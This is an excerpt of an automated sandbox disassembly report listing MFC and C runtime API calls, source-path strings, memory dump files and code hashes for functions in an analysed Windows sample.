                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 00709058
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$EnablePeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 3413051009-3811864384
                                • Opcode ID: 0f622f47ad879f1783dc612be6201ba02d280932a7a5bbf0f260d6729555cccf
                                • Instruction ID: 2a8684e47db71c3f51fdb017da6fcff8735b0ff4cfba5cf64a32a87061ab557a
                                • Opcode Fuzzy Hash: 0f622f47ad879f1783dc612be6201ba02d280932a7a5bbf0f260d6729555cccf
                                • Instruction Fuzzy Hash: 28010C75710209EFC714DB55C944E5AB7FAFF88344F208298EA0497392D735EE41DB90
                                APIs
                                • IsWindow.USER32(?), ref: 007088D2
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 007088E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 1690974351-3811864384
                                • Opcode ID: 03870f36c5ea791bb414540e29c816ea86020e02e479c8249a90a0ec7c5b1823
                                • Instruction ID: b13a3f10683b73b67c6999c6e99f354d47368703575ccd130db94dbad1ac325d
                                • Opcode Fuzzy Hash: 03870f36c5ea791bb414540e29c816ea86020e02e479c8249a90a0ec7c5b1823
                                • Instruction Fuzzy Hash: 93017175A10108EFC704DF94C884EAEB7B9AF8C300F208298E94497391DA34EE51DB55
                                APIs
                                • IsWindow.USER32(?), ref: 00708F50
                                • ShowWindow.USER32(?,007002D5,?,007002D5,00000001), ref: 00708F8B
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 00708F68
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuitShow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 594435314-3811864384
                                • Opcode ID: e59552c97f23afa2cdb331f26d9e91e39bfdd71ea71adb16a8d9ed9bce2cb5e0
                                • Instruction ID: f6a6ef5d5cba0e3b2c29b6ea9c777a3e0fe95ef7faaa9f5c02dcf5a1b908dc9b
                                • Opcode Fuzzy Hash: e59552c97f23afa2cdb331f26d9e91e39bfdd71ea71adb16a8d9ed9bce2cb5e0
                                • Instruction Fuzzy Hash: 2F014C75610109EFD754DB64C980E6AB3F6BF88300F208298F94897391DB34EE41DB81
                                APIs
                                • IsWindow.USER32(?), ref: 007087D0
                                • GetDlgItem.USER32(?,00000000), ref: 007087FF
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 007087DC
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ItemPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 1284619575-3811864384
                                • Opcode ID: a8cef2c440bca55566f90e73b89d602d17c205a7cc2b32c09ab7add1f6a83307
                                • Instruction ID: 31d0de0053cf872ef872d5286cd79bd66a0c0e72f886fe476837332e2fa31095
                                • Opcode Fuzzy Hash: a8cef2c440bca55566f90e73b89d602d17c205a7cc2b32c09ab7add1f6a83307
                                • Instruction Fuzzy Hash: F2017875A00208EFCB14DB94D984D6A77F9BF8C300B204298FA0597381DB34EE40EB95
                                APIs
                                • GetWindowLongA.USER32(?,000000F0), ref: 006FB07D
                                • GetParent.USER32(?), ref: 006FB08E
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FB060
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongParentWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3996284917-4102074842
                                • Opcode ID: 1fb01679cbe58a8240a6c16fe9bad9353296f2668dab92deb5752b0719362fbb
                                • Instruction ID: 257bd161b4f3868d44a781d101101008ba28dc6d1621e37c24d3068080ffd9e2
                                • Opcode Fuzzy Hash: 1fb01679cbe58a8240a6c16fe9bad9353296f2668dab92deb5752b0719362fbb
                                • Instruction Fuzzy Hash: CD016275D0420CFFCB14DFA4D8499BFB7B9EB84304F208595A915A7380DB349A41CF40
                                APIs
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 0072D792
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongWindow
                                • String ID: combobox
                                • API String ID: 1378638983-2240613097
                                • Opcode ID: 7dedcf431d6806950988ac3cc2d176d70b7470e409ce27bff90b8d73cf56f9b9
                                • Instruction ID: b9211b3c2619f3c5c5fee19bac77aa6ceb3c878dde68a5512576cd09462e22e2
                                • Opcode Fuzzy Hash: 7dedcf431d6806950988ac3cc2d176d70b7470e409ce27bff90b8d73cf56f9b9
                                • Instruction Fuzzy Hash: F6F0C832A14219EFCB20EFB4DC4596B77B4EB58714F504919F816CB281D638E944D791
                                APIs
                                • IsWindow.USER32(?), ref: 00708950
                                • GetWindowLongA.USER32(?,000000F0), ref: 00708989
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 00708968
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$LongPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 3077408344-3811864384
                                • Opcode ID: 91d75e6925897f372cc06b0220eeb3c311c4cd324fb4e374616fbb5fa56be767
                                • Instruction ID: 199dc2592254480ca681fab79caa537c49e9b9c9934862d5bf365175afcf8647
                                • Opcode Fuzzy Hash: 91d75e6925897f372cc06b0220eeb3c311c4cd324fb4e374616fbb5fa56be767
                                • Instruction Fuzzy Hash: 68014B35A20209EFCB54EB95C944E69B3F5FF88314F204298E94897381CB34EE41DB82
                                APIs
                                • IsWindow.USER32(?), ref: 007089C0
                                • GetWindowLongA.USER32(?,000000EC), ref: 007089F9
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 007089D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$LongPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 3077408344-3811864384
                                • Opcode ID: fa5fe838e1c29bee89632edc6f2a0dade287344052fd090f41e6bb9e529f5d6a
                                • Instruction ID: 8d3b18c291231e41c81917cf41ddc041bdebfa6809e04ebba517bd18f4ef4b33
                                • Opcode Fuzzy Hash: fa5fe838e1c29bee89632edc6f2a0dade287344052fd090f41e6bb9e529f5d6a
                                • Instruction Fuzzy Hash: 60018B71A14109EFCB54EB84C945E29B7F5FF88304F204299E84997781CB34EE41DF42
                                APIs
                                • IsWindow.USER32(?), ref: 00708FD0
                                • IsWindowEnabled.USER32(?), ref: 00709007
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 00708FE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$EnabledPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 3410888655-3811864384
                                • Opcode ID: e9f97477f36e279ca2f9b2f01f996bc266f9e28c66679e9aedf3494edbef740d
                                • Instruction ID: 3080543e45833f2354fa2c8745f6b531c161f569527848e41fb99ae45281fbf5
                                • Opcode Fuzzy Hash: e9f97477f36e279ca2f9b2f01f996bc266f9e28c66679e9aedf3494edbef740d
                                • Instruction Fuzzy Hash: 0301FB75A0420AEFCB54EB94D994E69B3B6FF88304F204298E9049B382DB35EE41DB45
                                APIs
                                  • Part of subcall function 1000815E: __getptd.LIBCMT ref: 10008164
                                  • Part of subcall function 1000815E: __getptd.LIBCMT ref: 10008174
                                • __getptd.LIBCMT ref: 1000A8AB
                                  • Part of subcall function 1000B30C: __getptd_noexit.LIBCMT ref: 1000B30F
                                  • Part of subcall function 1000B30C: __amsg_exit.LIBCMT ref: 1000B31C
                                • __getptd.LIBCMT ref: 1000A8B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                • String ID: csm
                                • API String ID: 803148776-1018135373
                                • Opcode ID: f4c60e4f92b1eb9adaa5c55835bf64672d9b617c6edfa6c25a17a35f8ba386cf
                                • Instruction ID: e7359dbeb61edcd3e06b07713ba745aaa50724def367fb31db9750ba9d1795f7
                                • Opcode Fuzzy Hash: f4c60e4f92b1eb9adaa5c55835bf64672d9b617c6edfa6c25a17a35f8ba386cf
                                • Instruction Fuzzy Hash: A0014B399006069AEF24CF20C84069CB3F5FF012D1F66462EE48156695CB319BC5DB51
                                APIs
                                • IsWindow.USER32(?), ref: 0070E8C0
                                • EndDialog.USER32(?,00000001), ref: 0070E908
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp, xrefs: 0070E8CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DialogPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
                                • API String ID: 1590405715-2300472847
                                • Opcode ID: cdabe837c81c9bf812935dfb97f77fb1431d4545cffc7e78e391cf2a7832c808
                                • Instruction ID: a9a96b7ad28a5f57212ff47d66aee3624d1562330f7cb33832eaf0b7f3a39a1f
                                • Opcode Fuzzy Hash: cdabe837c81c9bf812935dfb97f77fb1431d4545cffc7e78e391cf2a7832c808
                                • Instruction Fuzzy Hash: 3EF03175B04208EFC718CF98C985D5EB7F5AF88340B2442A8F90997791D634EE41DB94
                                APIs
                                • IsWindow.USER32(00000000), ref: 007080F0
                                • SetScrollRange.USER32(006FB52C,00000002,?,?,006FB52C), ref: 00708123
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007080FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitRangeScrollWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 432955539-1404496517
                                • Opcode ID: 065f478cdd8d4a62584e803907e82b6f2822b287eb552ec5bf13b8b35b6feb89
                                • Instruction ID: 97ebf41a5eaceea50bc10058920b49b3786831023b68f9b9870c380b1683652b
                                • Opcode Fuzzy Hash: 065f478cdd8d4a62584e803907e82b6f2822b287eb552ec5bf13b8b35b6feb89
                                • Instruction Fuzzy Hash: 31F058B6604208EBC718CF95DD45E6A77A9BF88300F24464CFA0897280CA75DD019B65
                                APIs
                                • failwithmessage.LIBCMTD ref: 0090EE97
                                  • Part of subcall function 0090EED0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0090EF3D
                                  • Part of subcall function 0090EED0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 0090EF58
                                  • Part of subcall function 0090EED0: DebuggerProbe.LIBCMTD ref: 0090EF7B
                                  • Part of subcall function 0090EED0: DebuggerRuntime.LIBCMTD ref: 0090EF9E
                                  • Part of subcall function 0090EED0: IsDebuggerPresent.KERNEL32 ref: 0090EFCF
                                • failwithmessage.LIBCMTD ref: 0090EEB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Debugger$ByteCharMultiWidefailwithmessage$PresentProbeRuntime
                                • String ID: Unknown Runtime Check Error
                                • API String ID: 3941055102-2722348778
                                • Opcode ID: b852696d9ffb330cdca6fcb2525da49ea11657c02f355f7c185e04c299cefce8
                                • Instruction ID: d6849092a68023d7db8d8a3fc81e108d6552b19d1d7e45ca0377752721cbb1a2
                                • Opcode Fuzzy Hash: b852696d9ffb330cdca6fcb2525da49ea11657c02f355f7c185e04c299cefce8
                                • Instruction Fuzzy Hash: F0E06DB5A201082FEB14EA5CEC45E3B339EDBC4328F184A18F91CC72C1F631ED614660
                                APIs
                                • IsWindow.USER32(?), ref: 00705940
                                • SendMessageA.USER32(?,?,?,00000000), ref: 0070596E
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070594C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 2781468842-1404496517
                                • Opcode ID: 5eccd54abb66433d77843f528e439bb7414bd25f7aa75f21f65cdc52c8c4d322
                                • Instruction ID: ef96ec37ed44ecbfa203e74d9404bcbc1140baa747cb725733bf3f7ce351bc73
                                • Opcode Fuzzy Hash: 5eccd54abb66433d77843f528e439bb7414bd25f7aa75f21f65cdc52c8c4d322
                                • Instruction Fuzzy Hash: 11F08CB6614208EBC718CF99D944D6B77FDEF8C350B10424CFA0993280DA34EE10DB64
                                APIs
                                • IsWindow.USER32(?), ref: 00705990
                                • PostMessageA.USER32(?,?,?,?), ref: 007059BE
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070599C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Post$PeekQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3957281121-1404496517
                                • Opcode ID: d655d6adbfa2bff16d0e2a2d4ea06bd6ddf116edcad696ce14cbd9763a84e57b
                                • Instruction ID: 6965f596de76976d5dc239314660102536f84c4dc0ef5d5dd75a36a8e496253d
                                • Opcode Fuzzy Hash: d655d6adbfa2bff16d0e2a2d4ea06bd6ddf116edcad696ce14cbd9763a84e57b
                                • Instruction Fuzzy Hash: 23F08CB6614208EBC718CF99D944D6B77E9AF8C750B24424CF90893280DA34ED00DBA5
                                APIs
                                • IsMenu.USER32(00000000), ref: 00719C50
                                • AppendMenuA.USER32(00000000,?,?,00000065), ref: 00719C81
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl, xrefs: 00719C5F
                                Memory Dump Source
